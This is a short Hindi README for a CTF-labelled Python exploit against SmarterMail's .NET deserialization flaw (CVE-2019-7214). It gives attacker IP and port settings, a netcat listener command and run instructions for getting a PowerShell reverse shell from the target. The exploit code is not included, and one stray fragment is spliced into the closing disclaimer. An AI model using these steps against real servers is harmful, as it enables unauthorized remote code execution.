
केवल CTF उपयोग के लिए (CVE-2019-7214 होस्ट को /etc/hosts से भी रिज़ॉल्व करता है)
यह Python स्क्रिप्ट एक दूरस्थ Windows मशीन पर चल रही एक संवेदनशील सेवा को लक्षित करती है। यह एक सीरियलाइज़्ड .NET पेलोड भेजती है जो हमलावर की मशीन पर वापस PowerShell-आधारित रिवर्स शेल लॉन्च करता है।
SmarterMail सिस्टम के लिए .NET deserialization में रिमोट कोड एक्ज़ीक्यूशन।
अपने वातावरण से मेल खाने के लिए स्क्रिप्ट के कॉन्फ़िगरेशन सेक्शन को अपडेट करें:
HOSTNAME = 'hostname' # लक्ष्य होस्टनाम (/etc/hosts के माध्यम से हल किया गया)
PORT = 9999 # लक्ष्य पोर्ट जो सीरियलाइज़्ड इनपुट सुन रहा है
LHOST = '192.168.45.185' # हमलावर IP (लिसनर)
LPORT = 4444 # हमलावर लिसनिंग पोर्ट
nc -lvnp 4444
python3 CVE-2019-7214 .py
यदि सफल होता है, तो आपको अपने लिसनर पर लक्ष्य से एक PowerShell प्रॉम्प्ट प्राप्त होगा।
System.Management.Automation कार्यक्षमता वाले deserialized ऑब्जेक्ट्स को निष्पादित कर सकता है।यह स्क्रिप्ट केवल शैक्षिक उद्देश्यों के लिए प्रदान की गई है। उन सिस्टमों के खिलाफ अनधिकृत उपयोग जिनके आप स्वामी नहीं हैं या जिनके परीक्षण के लिए आपके पास स्पष्ट अनुमति नहीं है, अवैध और अनैतिक है।